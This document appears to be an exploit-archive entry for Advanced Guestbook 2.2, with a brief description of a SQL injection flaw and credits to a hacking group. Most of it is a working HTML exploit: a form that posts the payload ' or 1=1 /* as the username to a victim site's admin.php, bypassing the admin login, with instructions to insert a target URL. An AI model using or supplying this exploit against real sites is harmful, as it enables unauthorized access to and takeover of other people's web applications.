Advanced Guestbook version 2.2 suffers from a SQL injection flaw in the username variable. The SQL injection flaw for the password variable was discovered for this same version back in April of 2004.
f61e489b60efad5c4eda08398798cbbdef01b872ac38d8958e369bbe80739c1a
In GOD We Trust;
Kachal667 Under9round Team (KuT)
new exploit with HTML for Advanced Guestbook 2.2 .
This bug found by BHST.
Coded By Hessam-x
Note : For use this exploit first change [target] to victim example : www.targetsite.com/guestbook/admin.php
=====HTML CODE :
<html>
<title>GuestBook 2.2 exploit</title>
<B>Guest Book 2.2 Exploit - coded by Hessam-x - </B>
<B>change "[target]" to Target in source code</B>
<!-- CHANGE [target] to target url / coded by hessam-x @ Kachal667 underground Team --!>
<form method="POST" action="http://[target]/admin.php">
<input type="hidden" name="username" value=" ' or 1=1 /*">
<input type="hidden" name="password" value="">
<input type="hidden" name="enter" value="1">
<center><input type="submit" value="GO" class="input"></center>
</html>